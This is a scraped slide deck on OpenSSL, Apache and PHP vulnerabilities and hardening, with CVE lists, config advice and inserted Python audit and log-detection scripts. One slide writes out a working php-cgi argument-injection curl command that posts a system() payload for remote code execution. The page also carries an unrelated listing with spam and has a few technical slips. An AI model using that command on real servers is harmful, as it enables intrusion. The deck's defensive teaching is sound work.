OpenLogic by Perforce © Perforce Software, Inc.
ANDREW L. CARR | SR. ENTERPRISE ARCHITECT
Confidentiality Statement
The information contained in this document is strictly confidential, privileged, and
only for the information of the intended recipient. The information contained in this
document may not be otherwise used, disclosed, copied, altered, or distributed
without the prior written consent of Perforce Software, Inc.
Overview
AUG 12, 2020
PHP, Apache and OpenSSL Vulnerabilities
Andrew Carr
Java Developer / Enterprise Architect
Started professionally in 2001
Agenda
PATH
Review OpenSSL
Review Apache Hardening
Review PHP Hardening
CORE CONCEPTS
MODIFYING: modifying the configuration.
REMOVING: problematic modules and configurations.
ADDING: modules that focus on security.
OpenSSL
OpenSSL is a robust, commercial-grade, and full-featured toolkit for the Transport Layer Security
(TLS) and Secure Sockets Layer (SSL) protocols
• Provides encryption tools
• Allows Apache / other web servers to encrypt traffic
• Provides a lot of other tools
Encryption in Detail
TYPES OF ENCRYPTION
Symmetric Key
Public Key
DEFINITIONS
Cipher: algorithm used for encryption or decryption
Algorithm: procedure the encryption process follows
Cryptanalysis: study of ciphers and cryptosystems to find weaknesses
OpenSSL
Between 1998 and 2010: versions 0.9.1 to 0.9.8
Current version 3.0, released 2020
Companies currently run production with 0.9.8-1.1.x, 7-12 years old
OpenSSL - CLI
'openssl version'
'openssl version -a'
'openssl ciphers -v' (cipher list; use 'man ciphers' for more information)
'openssl speed' (benchmark tool)
Heartbleed
• Bug is in OpenSSL's implementation of the TLS/DTLS (transport layer security protocols) heartbeat
extension (RFC 6520). When it is exploited it leads to the leak of memory contents from the server to the
client and from the client to the server.
• "Without using any privileged information or credentials we were able to steal from ourselves the
secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business
critical documents and communication."
• Affects
• OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
• OpenSSL 1.0.1g is NOT vulnerable
• OpenSSL 1.0.0 branch is NOT vulnerable
• OpenSSL 0.9.8 branch is NOT vulnerable
• Mitigation
• 1.0.1g or newer should be used.
• Recompile with -DOPENSSL_NO_HEARTBEATS.
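To turn the affected-version list above into a check, here is an added example (not from the deck) that parses 'openssl version' output and classifies it by the ranges the slide gives, plus the 0.9.8 EOL warning from a later slide; the letter-suffix ordering used for pre-3.0 patch releases is the only assumption beyond the slide.

```python
import re

# Heartbleed range as given on the slide: OpenSSL 1.0.1 through 1.0.1f inclusive.
# 1.0.1g is the fix; the 0.9.8 and 1.0.0 branches never contained the bug.
HEARTBLEED_FIRST = (1, 0, 1, 0)   # 1.0.1 with no patch letter
HEARTBLEED_LAST = (1, 0, 1, 6)    # 1.0.1f: a=1, b=2, ... f=6

# Matches the start of 'openssl version' output, e.g. "OpenSSL 1.0.1e-fips 11 Feb 2013".
_VERSION_RE = re.compile(r"^(?:OpenSSL\s+)?(\d+)\.(\d+)\.(\d+)([a-z]*)")


def _letters_to_int(letters):
    """Pre-3.0 patch letters sort a < b < ... < z < za < zb; '' (no letter) is 0."""
    value = 0
    for ch in letters:
        value = value * 26 + (ord(ch) - ord("a") + 1)
    return value


def parse_openssl_version(text):
    """Turn 'openssl version' output into a comparable (major, minor, fix, patch) tuple.
    Build suffixes such as '-fips' and the trailing release date are ignored."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised OpenSSL version string: %r" % text)
    major, minor, fix, letters = m.groups()
    return (int(major), int(minor), int(fix), _letters_to_int(letters))


def heartbleed_status(text):
    """Classify a version string as 'vulnerable', 'fixed' (1.0.1g or later on the
    1.0.1 branch) or 'unaffected-branch' (any other branch, e.g. 1.0.0 or 0.9.8)."""
    v = parse_openssl_version(text)
    if HEARTBLEED_FIRST <= v <= HEARTBLEED_LAST:
        return "vulnerable"
    if v[:3] == (1, 0, 1):
        return "fixed"
    return "unaffected-branch"


def audit_openssl_version(text):
    """Combine the two checks the deck asks for: Heartbleed exposure and the
    0.9.8 branch, which the deck marks EOL (Dec 2015) and 'DO NOT USE'."""
    v = parse_openssl_version(text)
    return {
        "parsed": v,
        "heartbleed": heartbleed_status(text),
        "eol_branch": v[:3] == (0, 9, 8),
    }


if __name__ == "__main__":
    # Run against the locally installed binary when executed directly.
    import subprocess
    out = subprocess.run(["openssl", "version"], capture_output=True, text=True).stdout
    print(audit_openssl_version(out))
```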
Heartbleed in the Community
Venafi scan of the Forbes Global 2000: more than 0.5 million hosts are vulnerable.
What should they do? Upgrade OpenSSL | Create new keys | Reissue certs
OpenSSL - DoS
CVE-2017-3733
What is DoS?
Affected versions include 0.9.8 – 1.1.0 (not 1.0.2)
Mitigation
• Upgrade OpenSSL to 1.1.0e
• Use OpenSSL 1.0.2
0.9.8 EOL – Dec 2015 (DO NOT USE)
OpenSSL – How To Avoid Vulnerability
• Stay current - https://www.openssl.org/news/
• CVEs - https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=openssl
• OpenUpdate from OpenLogic
• Ensure your OpenSSL is up to date
OpenSSL Vulnerabilities
• DROWN
• A serious vulnerability that affects HTTPS and other services that rely on SSL and TLS, some of the essential cryptographic
protocols for Internet security. These protocols allow everyone on the Internet to browse the web, use email, shop online,
and send instant messages without third parties being able to read the communication.
• HEARTBLEED
• M-I-T-M Attack
• DoS Vulnerabilities
• Other M-I-T-M
• Symantec discovers vulnerability that affects OpenSSL versions 1.0.2c, 1.0.2b, 1.0.1n, and 1.0.1o. Users of versions 1.0.2b
and 1.0.2c are advised to immediately upgrade to 1.0.2d. Users of versions 1.0.1n and 1.0.1o are advised to immediately
upgrade to 1.0.1p.
OpenSSL Installation
OpenSSL is preinstalled on a lot of operating systems.
Building is simple:
Get the source
Configure
Compile
Install
Reference the new OpenSSL when building other products
OpenSSL Hardening
• Stay current
• This is limited by other software's ability to update
• Normal network safety hardening
• Limit of what you can harden with OpenSSL specifically
• OpenSSL is used to support the applications we will harden
Apache Web Server
Apache Web Server
A community web server with widespread deployment
Current versions
2.4.29
2.2.34 (FINAL)
2.2 was EOL'd June 2017 with security updates to December 2017
Approx. 68 million public instances of Apache Web in use (builtwith.com)
More than 70% use vulnerable versions
Apache Vulnerabilities
0-DAY – WHAT IS IT?
2.2 VULNERABILITIES
OptionsBleed - CVE-2017-9798
• Ignore the htaccess file
Uninitialized Memory Reflection – CVE-2017-9788
• Affects 2.2.0 – 2.2.32 (fixed in 2.2.34)
• Reveals confidential information
Authentication Bypass – CVE-2017-3167
CVE
Apache 2.2.22 Vulnerability
DoS
http://www.cvedetails.com/cve/CVE-2014-0098/
http://www.cvedetails.com/cve/CVE-2013-6438/
http://www.cvedetails.com/cve/CVE-2014-0231/
http://www.cvedetails.com/cve/CVE-2013-1896/
XSS
http://www.cvedetails.com/cve/CVE-2012-4558/
http://www.cvedetails.com/cve/CVE-2012-3499/
Code-Exec
http://www.cvedetails.com/cve/CVE-2013-1862/
Apache 2.2 Additional Vulnerabilities
• important: Uninitialized memory reflection in mod_auth_digest (CVE-2017-9788)
• important: ap_get_basic_auth_pw() Authentication Bypass (CVE-2017-3167)
• important: mod_ssl Null Pointer Dereference (CVE-2017-3169)
• important: ap_find_token() Buffer Overread (CVE-2017-7668)
• important: mod_mime Buffer Overread (CVE-2017-7679)
• important: Apache HTTP Request Parsing Whitespace Defects (CVE-2016-8743)
• n/a: HTTP_PROXY environment variable "httpoxy" mitigation (CVE-2016-5387)
• low: HTTP request smuggling attack against chunked request parser (CVE-2015-3183)
• important: mod_cgid denial of service (CVE-2014-0231)
• low: HTTP Trailers processing bypass (CVE-2013-5704)
• moderate: mod_deflate denial of service (CVE-2014-0118)
• moderate: mod_status buffer overflow (CVE-2014-0226)
• low: mod_log_config crash (CVE-2014-0098)
• moderate: mod_dav crash (CVE-2013-6438)
• low: mod_rewrite log escape filtering (CVE-2013-1862)
• moderate: mod_dav crash (CVE-2013-1896)
• low: XSS due to unescaped hostnames (CVE-2012-3499)
• moderate: XSS in mod_proxy_balancer (CVE-2012-4558)
• low: XSS in mod_negotiation when untrusted uploads are supported (CVE-2012-2687)
• Note: This issue is also known as CVE-2008-0455.
• low: insecure LD_LIBRARY_PATH handling (CVE-2012-0883)
• low: mod_proxy_ajp remote DoS (CVE-2012-4557)
• low: mod_setenvif .htaccess privilege escalation (CVE-2011-3607)
• low: mod_log_config crash (CVE-2012-0021)
• low: scoreboard parent DoS (CVE-2012-0031)
• moderate: mod_proxy reverse proxy exposure (CVE-2011-4317)
• moderate: error responses can expose cookies (CVE-2012-0053)
• low: mod_deflate DoS (CVE-2009-1891)
• low: AllowOverride Options handling bypass (CVE-2009-1195)
• low: CRLF injection in mod_negotiation when untrusted uploads are supported (CVE-2008-0456)
• moderate: APR-util off-by-one overflow (CVE-2009-1956)
• moderate: APR-util XML DoS (CVE-2009-1955)
• moderate: APR-util heap underwrite (CVE-2009-0023)
• important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2791)
• low: mod_proxy_ftp globbing XSS (CVE-2008-2939)
• low: mod_proxy_balancer CSRF (CVE-2007-6420)
• moderate: mod_proxy_http DoS (CVE-2008-2364)
• low: mod_proxy_ftp UTF-7 XSS (CVE-2008-0005)
• low: mod_proxy_balancer DoS (CVE-2007-6422)
• low: mod_proxy_balancer XSS (CVE-2007-6421)
• moderate: mod_status XSS (CVE-2007-6388)
• moderate: mod_imagemap XSS (CVE-2007-5000)
• moderate: mod_proxy crash (CVE-2007-3847)
• moderate: mod_status cross-site scripting (CVE-2006-5752)
• moderate: Signals to arbitrary processes (CVE-2007-3304)
• moderate: mod_cache information leak (CVE-2007-1862)
• moderate: mod_cache proxy DoS (CVE-2007-1863)
• important: mod_rewrite off-by-one error (CVE-2006-3747)
• low: mod_ssl access control DoS (CVE-2005-3357)
• moderate: mod_imap Referer Cross-Site Scripting (CVE-2005-3352)
• moderate: mod_proxy_ajp remote DoS (CVE-2011-3348)
• important: Range header remote DoS (CVE-2011-3192)
• Advisory: CVE-2011-3192.txt
• moderate: apr_fnmatch flaw leads to mod_autoindex remote DoS (CVE-2011-0419)
• low: expat DoS (CVE-2009-3720)
• low: expat DoS (CVE-2009-3560)
• low: apr_brigade_split_line DoS (CVE-2010-1623)
• important: Timeout detection flaw (mod_proxy_http) (CVE-2010-2068)
http://www.apache.org/dist/httpd/patches/apply_to_2.2.15/CVE-2010-2068-r953616.patch
• http://www.apache.org/dist/httpd/patches/apply_to_2.3.5/CVE-2010-2068-r953418.patch
• http://www.apache.org/dist/httpd/binaries/win32/mod_proxy_http-CVE-2010-2068.zip
• low: mod_cache and mod_dav DoS (CVE-2010-1452)
• important: mod_isapi module unload flaw (CVE-2010-0425)
• low: Subrequest handling of request headers (mod_headers) (CVE-2010-0434)
• moderate: mod_proxy_ajp DoS (CVE-2010-0408)
• low: mod_proxy_ftp DoS (CVE-2009-3094)
• low: mod_proxy_ftp FTP command injection (CVE-2009-3095)
• moderate: Solaris pollset DoS (CVE-2009-2699)
• low: APR apr_palloc heap overflow (CVE-2009-2412)
• important: mod_proxy reverse proxy DoS (CVE-2009-1890)
• important: mod_proxy_ajp information disclosure (CVE-2009-1191)
Apache - Upgrading
UPGRADE TO 2.4
Not that complicated
Most setups that run 2.2 will run 2.4
http://httpd.apache.org/docs/2.4/upgrading.html
2.2 configuration:
Order deny,allow
Deny from all
TO-> Require all denied
2.2 configuration:
Order allow,deny
Allow from all
TO-> Require all granted
Critical Apache 2.4 Vulnerabilities
• CVE-2009-1891 (CWE-399)
• mod_deflate allowing DoS
• Latest affected version is 2.2.11, but there are sporadic reports on early 2.4
• CVE-2009-1890 (CWE-189)
• mod_proxy_http allowing DoS via CPU locking
• Latest version 2.3.2, some reports on 2.4.0-.1
• CVE-2013-2249
• mod_session_dbd module allowing arbitrary command execution via HTTP request containing escape chars
• Latest affected version 2.4.4
• CVE-2012-0883
• envvars-std Trojan horse injection
• Version 2.4.2 is affected.
Hardening Apache 2
• What is hardening?
• ServerSignature
• Turn off
• Prevents pages from displaying information about the server
• Turn off directory listings
• Options
• Check for unused modules
• httpd.conf
• Use groups / users
• httpd.conf – User / Group
Hardening Apache 2 (cont.)
Use Allow and Deny on directories
• <Directory> Deny from all
Install mod_security
• yum install libapache2-modsecurity
Use mod_evasive
Disable symlinks
• -FollowSymLinks
Turn off server-side includes
• -Includes
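The two hardening slides and the 2.2-to-2.4 upgrade slide together form a checklist; here is an added example (not from the deck or the Apache project) that walks an httpd.conf and reports ServerSignature, the Options the deck turns off, missing or root User/Group, and leftover 2.2-style Order/Allow/Deny lines that should become Require. The sample configs are constructed, and the directive reader only tracks <Directory> containers.

```python
import re

# Constructed sample (not from the deck): a 2.2-style config with the weaknesses
# the hardening slides call out.
WEAK_CONF = """\
ServerSignature On
User apache
Group apache
<Directory />
    Options Indexes FollowSymLinks Includes
    Order deny,allow
    Deny from all
</Directory>
<Directory "/var/www/html">
    Options All
    Order allow,deny
    Allow from all
</Directory>
"""

# Constructed 2.4-style counterpart that passes every check below.
HARDENED_CONF = """\
ServerSignature Off
User apache
Group apache
<Directory />
    Options -Indexes -FollowSymLinks -Includes
    Require all denied
</Directory>
<Directory "/var/www/html">
    Options None
    Require all granted
</Directory>
"""

# Options the deck says to switch off, with the reason it gives.
RISKY_OPTIONS = {
    "Indexes": "directory listings",
    "FollowSymLinks": "symlink following",
    "Includes": "server-side includes",
}
LEGACY_ACCESS = ("order", "allow", "deny")  # mod_access_compat; 2.4 uses Require


def iter_directives(conf):
    """Yield (name, args, directory) per directive, tracking <Directory> blocks.
    Full-line '#' comments and blank lines are skipped."""
    directory = None
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        m = re.match(r"<Directory\s+(.+?)\s*>$", line, re.IGNORECASE)
        if m:
            directory = m.group(1).strip('"')
            continue
        if line.lower() == "</directory>":
            directory = None
            continue
        parts = line.split()
        yield parts[0], parts[1:], directory


def audit_httpd_conf(conf):
    """Return (code, where, detail) findings for the deck's checklist."""
    findings = []
    seen = set()
    for name, args, directory in iter_directives(conf):
        key = name.lower()
        where = directory or "server config"
        seen.add(key)
        if key == "serversignature" and args and args[0].lower() != "off":
            findings.append(("server-signature", where, "ServerSignature %s; set Off" % args[0]))
        elif key == "options":
            for opt in args:
                enabled = not opt.startswith("-")
                bare = opt.lstrip("+-")
                # 'All' enables every option except MultiViews, so it enables all three.
                hits = list(RISKY_OPTIONS) if bare == "All" else [bare]
                for h in hits:
                    if enabled and h in RISKY_OPTIONS:
                        findings.append(("options", where,
                                         "Options enables %s (%s); use -%s" % (h, RISKY_OPTIONS[h], h)))
        elif key in ("user", "group") and args and args[0].lower() == "root":
            findings.append(("user-group", where, "%s root; run httpd as an unprivileged account" % name))
        elif key in LEGACY_ACCESS:
            findings.append(("legacy-access", where,
                             "2.2-style '%s %s'; replace with Require" % (name, " ".join(args))))
    for req in ("user", "group"):
        if req not in seen:
            findings.append(("user-group", "server config", "no %s directive" % req.capitalize()))
    return findings
```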
PHP
PHP 5-7
PHP is in use everywhere
PHP 5 has over 500 vulnerabilities (Mitre.org)
Upgrade to PHP 7
Lots of information on migration
http://php.net/manual/en/migration70.php
If you have to use 5, harden it
Remote Code Execution Vulnerability
• Affected Versions
• 7.3 to 7.3.10
• What is it?
• Allows an attacker to execute remote code to gain control of system data
• How?
• Bug #78559 (Heap Buffer Overflow in mb_eregi)
• Mitigation
• Upgrade to 7.4
• Apply security hardening principles, like least privilege
• Exploits
• No current exploits known; that does not mean they don't exist
PHP 5.5.9 Exploit – Moadmin
• Mongo Admin tool
• Allows execution of code
• Not PHP's fault
• Large negative impact
Hardening PHP
Prevent fopen wrappers
• allow_url_fopen
Limit process time / input time
• max_input_time
• max_execution_time
Limit script memory
• memory_limit
Turn register globals off
• register_globals
Hardening PHP
Don't expose PHP in response
• expose_php
Only use redirect
• cgi.force_redirect
Impose input restrictions
• post_max_size
• max_input_vars
Do not display error information
• display_errors=0
• display_startup_errors
Hardening PHP
Logging
log_errors=1
error_log = <path>
Restrict file access
open_basedir = <path>
File uploads
file_uploads = 0
<or>
upload_max_filesize = 1M
Session security
Cookie security
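The three "Hardening PHP" slides list php.ini directives without showing how to verify them on a real file; here is an added example (not from the deck or the PHP project) that reads a php.ini, falls back to PHP's built-in defaults for anything absent, and reports every directive that misses the deck's target. The two ini fragments are constructed, and the 1M upload cap is the figure the deck gives.

```python
import re

# Constructed sample php.ini fragments (not from the deck).
WEAK_INI = """\
[PHP]
allow_url_fopen = On
expose_php = On
display_errors = On
memory_limit = -1          ; unlimited
max_execution_time = 0     ; unlimited
file_uploads = On
upload_max_filesize = 20M
"""

HARDENED_INI = """\
[PHP]
allow_url_fopen = Off
expose_php = Off
display_errors = Off
display_startup_errors = Off
log_errors = On
error_log = "/var/log/php/error.log"
cgi.force_redirect = 1
open_basedir = /var/www/html:/tmp
max_execution_time = 30
max_input_time = 60
memory_limit = 128M
post_max_size = 8M
max_input_vars = 1000
file_uploads = Off
"""

# PHP's built-in defaults for the directives the deck lists, used when a
# directive is absent from the file (php.ini-production overrides some of these).
DEFAULTS = {
    "allow_url_fopen": "1", "expose_php": "1", "display_errors": "1",
    "display_startup_errors": "0", "register_globals": "0",
    "cgi.force_redirect": "1", "log_errors": "1",
    "error_log": "", "open_basedir": "",
    "max_execution_time": "30", "max_input_time": "-1", "memory_limit": "128M",
    "post_max_size": "8M", "max_input_vars": "1000",
    "file_uploads": "1", "upload_max_filesize": "2M",
}
MUST_BE_OFF = ("allow_url_fopen", "expose_php", "display_errors",
               "display_startup_errors", "register_globals")
MUST_BE_ON = ("cgi.force_redirect", "log_errors")
MUST_BE_SET = ("error_log", "open_basedir")
MUST_BE_LIMITED = ("max_execution_time", "max_input_time", "memory_limit",
                   "post_max_size", "max_input_vars")
UPLOAD_CAP = "1M"  # the deck's alternative to file_uploads = 0


def parse_php_ini(text):
    """Minimal php.ini reader: ';' comments and [sections] ignored, key = value, quotes stripped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip().strip('"')
    return settings


def is_off(value):
    """PHP treats these spellings as a false ini flag."""
    return value.lower() in ("", "0", "off", "false", "no", "none")


def size_bytes(value):
    """php.ini shorthand ('8M', '1024', '2G') to bytes; raises ValueError for '-1' etc."""
    m = re.match(r"^(\d+)\s*([kmg]?)$", value.strip().lower())
    if not m:
        raise ValueError("not a size: %r" % value)
    return int(m.group(1)) * {"": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3}[m.group(2)]


def audit_php_ini(text):
    """Return (directive, problem) pairs for every deck item the file fails."""
    cfg = dict(DEFAULTS)
    cfg.update(parse_php_ini(text))
    findings = []
    for key in MUST_BE_OFF:
        if not is_off(cfg[key]):
            findings.append((key, "should be Off, is %r" % cfg[key]))
    for key in MUST_BE_ON:
        if is_off(cfg[key]):
            findings.append((key, "should be On, is %r" % cfg[key]))
    for key in MUST_BE_SET:
        if not cfg[key]:
            findings.append((key, "not set"))
    for key in MUST_BE_LIMITED:
        try:
            limited = size_bytes(cfg[key]) > 0
        except ValueError:      # '-1' and similar mean 'no limit'
            limited = False
        if not limited:
            findings.append((key, "no positive limit, is %r" % cfg[key]))
    if not is_off(cfg["file_uploads"]) and size_bytes(cfg["upload_max_filesize"]) > size_bytes(UPLOAD_CAP):
        findings.append(("upload_max_filesize",
                         "uploads enabled at %s; set file_uploads = 0 or cap at %s"
                         % (cfg["upload_max_filesize"], UPLOAD_CAP)))
    return findings
```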
Building PHP 7
• sudo yum install git gcc gcc-c++ libxml2-devel pkgconfig openssl-devel bzip2-devel curl-devel libpng-devel libjpeg-devel libXpm-devel freetype-devel gmp-devel libmcrypt-devel mariadb-devel aspell-devel recode-devel autoconf bison re2c libicu-devel
• (Possibly) yum install bison
• sudo mkdir /usr/local/php7
• git clone https://github.com/php/php-src.git
• cd php-src
• git checkout php-7.4.9
• ./buildconf --force
• ./configure --prefix=/usr/local/php7 --with-config-file-path=/usr/local/php7/etc --with-config-file-scan-dir=/usr/local/php7/etc/conf.d --enable-bcmath --with-bz2 --with-curl --enable-filter --enable-fpm --with-gd --enable-gd-native-ttf --with-freetype-dir --with-jpeg-dir --with-png-dir --enable-intl --enable-mbstring --with-mcrypt --enable-mysqlnd --with-mysql-sock=/var/lib/mysql/mysql.sock --with-mysqli=mysqlnd --with-pdo-mysql=mysqlnd --with-pdo-sqlite --disable-phpdbg --disable-phpdbg-webhelper --enable-opcache --with-openssl --enable-simplexml --with-sqlite3 --enable-xmlreader --enable-xmlwriter --enable-zip --with-zlib
• make && make install
Building PHP 7
HOW TO BUILD
• Get the source
• Get the dependencies
• Grab additional files for anything you want to enable
• ./configure --help is your friend
• Ask Perforce experts
A Note About CGI Mode
What is it? A mode to serve (interpret) pages without a web server.
"Secure" This is supposed to be secure.
Why CGI Mode is NOT Secure
Remote Code Execution: you are inviting this sort of attack.
Common Exploits: there are several common exploits to take advantage of this.
curl -i -s -k -X 'POST'  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'  --data-binary "<?php system("$2"); die; ?>" 
"http://$1/cgibin/php5?%2dd+allow_url_include%3don+%2dd+safe_mode%3doff+%2dd+suhosin%2esimulation%3don+%2dd+disable_functions%3d%22%22+%2d
d+open_basedir%3dnone+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dd+cgi%2eforce_redirect%3d0+%2dd+cgi%2eredirect_status_env%3d0+%2dn"
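Detection logic for the php-cgi argument-injection pattern the curl command above relies on, as an added example that is not part of the deck: it models the CGI rule that a query string with no unencoded "=" is passed to the script as command-line arguments, then flags access-log requests to a php-cgi binary whose decoded arguments look like "-d"/"-n"/"-s" options. The log lines are constructed, and the combined-log regex and the set of php-cgi basenames are assumptions.

```python
import re
from urllib.parse import unquote

# Combined-log-format request lines, constructed for this example (not real traffic).
# Line 2 carries the same "-d directive=value" query shape the deck's curl command sends;
# line 4 has a literal '=' and so is ordinary query data, not argv.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Aug/2020:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.9 - - [12/Aug/2020:10:00:07 +0000] "POST /cgi-bin/php5?%2dd+allow_url_include%3don+%2dd+auto_prepend_file%3dphp%3a%2f%2finput+%2dn HTTP/1.1" 200 1024
198.51.100.2 - - [12/Aug/2020:10:00:09 +0000] "GET /cgi-bin/php?-s HTTP/1.1" 200 40960
198.51.100.7 - - [12/Aug/2020:10:00:12 +0000] "GET /cgi-bin/php?id=-s HTTP/1.1" 200 300
"""

# Assumed combined log format: ip ident user [ts] "METHOD target HTTP/x.y" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Assumed basenames under which php-cgi is exposed (php, php5, php7, php-cgi ...).
PHP_CGI_BASENAME = re.compile(r"^php(-cgi)?[\d.]*$")


def cgi_argv_from_query(query):
    """Model the CGI rule (RFC 3875 section 4.4): if the query string contains no
    unencoded '=', the server splits it on '+', URL-decodes each piece and hands
    the pieces to the script as command-line arguments. The deck's request encodes
    every '=' as %3d precisely so that this branch is taken."""
    if "=" in query:
        return []
    return [unquote(part) for part in query.split("+") if part]


def detect_php_cgi_injection(log_text):
    """Flag requests whose query string would reach php-cgi as option-style argv."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not PHP_CGI_BASENAME.match(path.rsplit("/", 1)[-1]):
            continue
        argv = cgi_argv_from_query(query)
        if any(arg.startswith("-") for arg in argv):
            hits.append({"ip": m.group("ip"), "path": path, "argv": argv})
    return hits


if __name__ == "__main__":
    for hit in detect_php_cgi_injection(SAMPLE_LOG):
        print(hit["ip"], hit["path"], hit["argv"])
```

The mitigation the surrounding slides point to still applies: do not expose php-cgi directly, and prefer the FPM build shown earlier (--enable-fpm) behind the web server.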
Hardening
• The web is your friend!!!
• Anti-Clickjacking and other practices
• https://geekflare.com/10-best-practices-to-secure-and-harden-your-apache-web-server/f
• Linux Hardening of Apache
• https://wiki.debian.org/Apache/Hardening
• PHP Hardening
• http://www.hardened-php.net/
Q & A

EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 

Apache web-server-security

9. OpenSSL - CLI
'openssl version'
'openssl version -a'
'openssl ciphers -v' (cipher list; use 'man ciphers' for more information)
'openssl speed' (benchmark tool)
10. Heartbleed
• The bug is in OpenSSL's implementation of the TLS/DTLS (transport layer security protocols) heartbeat extension (RFC 6520). When it is exploited it leads to the leak of memory contents from the server to the client and from the client to the server.
• "Without using any privileged information or credentials we were able to steal from ourselves the secret keys used for our X.509 certificates, user names and passwords, instant messages, emails and business critical documents and communication."
• Affects
  • OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
  • OpenSSL 1.0.1g is NOT vulnerable
  • OpenSSL 1.0.0 branch is NOT vulnerable
  • OpenSSL 0.9.8 branch is NOT vulnerable
• Mitigation
  • 1.0.1g or newer should be used.
  • Build with -DOPENSSL_NO_HEARTBEATS.
11. Heartbleed in the Community
Venafi scan of the Forbes Global 2000: more than 0.5 million hosts are vulnerable.
What should they do? Upgrade SSL | Create new keys | Reissue certs
12. OpenSSL - DoS, CVE-2017-3733
What is DoS?
Affected versions include 0.9.8 - 1.1.0 (not 1.0.2)
Mitigation
• Upgrade SSL to 1.1.0e
• Use OpenSSL 1.0.2
0.9.8 EOL - Dec 2015 (DO NOT USE)
13. OpenSSL - How To Avoid Vulnerability
• Stay current - https://www.openssl.org/news/
• CVEs - https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=openssl
• OpenUpdate from OpenLogic
• Ensure your OpenSSL is up to date
14. OpenSSL Vulnerabilities
• DROWN
  • A serious vulnerability that affects HTTPS and other services that rely on SSL and TLS, some of the essential cryptographic protocols for Internet security. These protocols allow everyone on the Internet to browse the web, use email, shop online, and send instant messages without third parties being able to read the communication.
• HEARTBLEED
• M-I-T-M Attack
• DoS Vulnerabilities
• Other M-I-T-M
